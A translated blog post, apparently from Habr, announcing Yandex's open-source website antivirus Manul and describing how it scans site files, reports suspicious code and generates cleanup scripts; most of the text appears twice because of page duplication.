Yandex has released antivirus for sites - Manul
Yandex search every day shows people more than eight million warnings that the page they want to go to is infected. Often, the site owner remembers that his site can be hacked and malicious code can be placed on it, only when the worst has already happened, the traffic has dropped, and users have managed to become infected.
So that webmasters can respond to problems as quickly as possible, we have been sending infection alerts on Yandex.Webmaster for several years. In them we give detailed instructions on what to do, and in the most difficult cases webmasters are assisted by our support service.
')
However, you always want the best. One of the main problems we face when communicating with owners of infected sites is finding the source of infection on the server side. Yandex, which lists thousands of sites every day as infected with a virus and dangerous for human devices, has a regularly updated database of viruses. And our team has an idea that has grown into a big project - an antivirus for sites. So we created Manul , which we decided to put in open source . This is a utility that will help the webmaster understand what happened to the site and cure it. Under the cut, I will tell you more about how it works and what problems it solves.
Infection of the site may occur not only because of its hacking, but also because of placing on it the code of any service that turned out to be not as reliable as you initially thought. When this happens to important sites for people, it harms not only their owners.
Our support team receives dozens of emails from webmasters every day asking for help to cope with the infection. But we, as a rule, see only the outbreaks of infection and often cannot say with certainty where exactly the malicious code should be searched for on the server. Similarly, we can not guarantee that the source of infection is only in one place. Thus, the main work to eliminate the causes of infection falls on the shoulders of the site owner, and because of this, the recovery process may be delayed. At the same time, we know that most of the problems are simple, but massive infections, calculated, for example, on the long-known vulnerabilities of old versions of CMS and individual components.
Therefore, we have an idea to make a simple tool - an anti-virus utility that would collect structured information about the site. After that, it should be possible to analyze the collected data independently or send it to a specialist. In addition, I would like such specialists to be like us, as well as studios or individual specialists who are also engaged in the treatment of sites, and if desired, the webmaster could do it himself. And, of course, the tool should be able to offer a healing script to automate the treatment process from beginning to end. Especially for ordinary cases.
We began to think how this can be realized. It was clear that this should be an easy to install utility that would not require access to administrator accounts. Since Yandex informs webmasters about the infection on their website, it will be sufficient if, in the event of such an infection, the utility can be quickly downloaded and installed, and after the treatment ends, it is also easy to delete the folder with the antivirus from the server.
Antivirus solutions for sites on the market already existed, but differed from what we would like to see: a free open source tool that is easy to use and which can be developed and supplemented by everyone. When creating our anti-virus utility, we decided to share our experience with Revisium .
Gregory Zemskov of Revisium had a great experience in scanning and treating sites on the server side, as well as a working solution - the Ai-Bolit script, which already contained a significant part of the desired functionality. We have combined our knowledge and wishes, and something new has happened - Manul.
The archive with Manul is uploaded to the root directory of the site - for example, via FTP / SFTP, and is unpacked there. Further work with the tool goes through the browser. When scanning, Manul collects information about all the files in the root directory and below it — about their size, date of last change, and calculates the hash sum. In parallel, each file is checked for maliciousness by the attached anti-virus database and is marked with one of three check boxes:
After completing the check, Manul saves all received information as an XML report. Code snippets - both suspicious and malicious - are also attached to the report.
To view the report there is a separate tool - Log Analyzer Manul, available online. It presents a report in the form of a table, allows you to filter files by a set of properties such as size, modification date and others, view fragments of a suspicious code. For various versions of popular CMS, the Analyzer automatically applies whitelists to immediately filter files from the standard configuration, in which no changes were noticed. And by clicking the Quarantine and Delete buttons located opposite each file, you can create a script for Manul, which will remove malicious files from the server, and suspicious ones will be placed in the archive for sending for analysis. You can execute this script by opening Manul and clicking on the Treatment tab.
Manul does not require access to sensitive data (such as passwords). All actions performed with the files are monitored and confirmed by the site owner. To prevent third parties from using the tool, it is necessary to protect it with a password when it is first started. No data about the site and user when using the utility is not automatically sent anywhere.
The utility is not demanding to the execution environment and is designed to run even on weak hostings. But still, for launching, it needs to fulfill certain conditions: the PHP version is at least 5.2 and that it contains ZipArchive modules, DOM and XML. Manul will also need read access to the web_root / public_html virtual host directory.
We decided to make it so that any webmaster could take advantage of our work. To do this, we have placed our Anti-Virus on Yandex.Webmaster and now we will always remind about its capabilities along with the notification that the site has been infected with a virus.
However, we have decided not to stop at what we have achieved. We want every developer to have the opportunity not only to use our Manul, but also to give it a new life. Manul is an open source project posted on GitHub . You can take part in its development, add new features or adapt the source code to your own needs.
So that webmasters can respond to problems as quickly as possible, we have been sending infection alerts on Yandex.Webmaster for several years. In them we give detailed instructions on what to do, and in the most difficult cases webmasters are assisted by our support service.
')
However, you always want the best. One of the main problems we face when communicating with owners of infected sites is finding the source of infection on the server side. Yandex, which lists thousands of sites every day as infected with a virus and dangerous for human devices, has a regularly updated database of viruses. And our team has an idea that has grown into a big project - an antivirus for sites. So we created Manul , which we decided to put in open source . This is a utility that will help the webmaster understand what happened to the site and cure it. Under the cut, I will tell you more about how it works and what problems it solves.
Infection of the site may occur not only because of its hacking, but also because of placing on it the code of any service that turned out to be not as reliable as you initially thought. When this happens to important sites for people, it harms not only their owners.
Our support team receives dozens of emails from webmasters every day asking for help to cope with the infection. But we, as a rule, see only the outbreaks of infection and often cannot say with certainty where exactly the malicious code should be searched for on the server. Similarly, we can not guarantee that the source of infection is only in one place. Thus, the main work to eliminate the causes of infection falls on the shoulders of the site owner, and because of this, the recovery process may be delayed. At the same time, we know that most of the problems are simple, but massive infections, calculated, for example, on the long-known vulnerabilities of old versions of CMS and individual components.
Therefore, we have an idea to make a simple tool - an anti-virus utility that would collect structured information about the site. After that, it should be possible to analyze the collected data independently or send it to a specialist. In addition, I would like such specialists to be like us, as well as studios or individual specialists who are also engaged in the treatment of sites, and if desired, the webmaster could do it himself. And, of course, the tool should be able to offer a healing script to automate the treatment process from beginning to end. Especially for ordinary cases.
We began to think how this can be realized. It was clear that this should be an easy to install utility that would not require access to administrator accounts. Since Yandex informs webmasters about the infection on their website, it will be sufficient if, in the event of such an infection, the utility can be quickly downloaded and installed, and after the treatment ends, it is also easy to delete the folder with the antivirus from the server.
Antivirus solutions for sites on the market already existed, but differed from what we would like to see: a free open source tool that is easy to use and which can be developed and supplemented by everyone. When creating our anti-virus utility, we decided to share our experience with Revisium .
Gregory Zemskov of Revisium had a great experience in scanning and treating sites on the server side, as well as a working solution - the Ai-Bolit script, which already contained a significant part of the desired functionality. We have combined our knowledge and wishes, and something new has happened - Manul.
How does all this work?
The archive with Manul is uploaded to the root directory of the site - for example, via FTP / SFTP, and is unpacked there. Further work with the tool goes through the browser. When scanning, Manul collects information about all the files in the root directory and below it — about their size, date of last change, and calculates the hash sum. In parallel, each file is checked for maliciousness by the attached anti-virus database and is marked with one of three check boxes:
- yellow - there is a suspicious code in the file, which, due to various signs, can be malicious;
- red - the malicious code known to us is present in the file;
- green - nothing suspicious was found in the file.
After completing the check, Manul saves all received information as an XML report. Code snippets - both suspicious and malicious - are also attached to the report.
To view the report there is a separate tool - Log Analyzer Manul, available online. It presents a report in the form of a table, allows you to filter files by a set of properties such as size, modification date and others, view fragments of a suspicious code. For various versions of popular CMS, the Analyzer automatically applies whitelists to immediately filter files from the standard configuration, in which no changes were noticed. And by clicking the Quarantine and Delete buttons located opposite each file, you can create a script for Manul, which will remove malicious files from the server, and suspicious ones will be placed in the archive for sending for analysis. You can execute this script by opening Manul and clicking on the Treatment tab.
Manul does not require access to sensitive data (such as passwords). All actions performed with the files are monitored and confirmed by the site owner. To prevent third parties from using the tool, it is necessary to protect it with a password when it is first started. No data about the site and user when using the utility is not automatically sent anywhere.
The utility is not demanding to the execution environment and is designed to run even on weak hostings. But still, for launching, it needs to fulfill certain conditions: the PHP version is at least 5.2 and that it contains ZipArchive modules, DOM and XML. Manul will also need read access to the web_root / public_html virtual host directory.
What next?
We decided to make it so that any webmaster could take advantage of our work. To do this, we have placed our Anti-Virus on Yandex.Webmaster and now we will always remind about its capabilities along with the notification that the site has been infected with a virus.
However, we have decided not to stop at what we have achieved. We want every developer to have the opportunity not only to use our Manul, but also to give it a new life. Manul is an open source project posted on GitHub . You can take part in its development, add new features or adapt the source code to your own needs.
Source: https://habr.com/ru/post/256463/
All Articles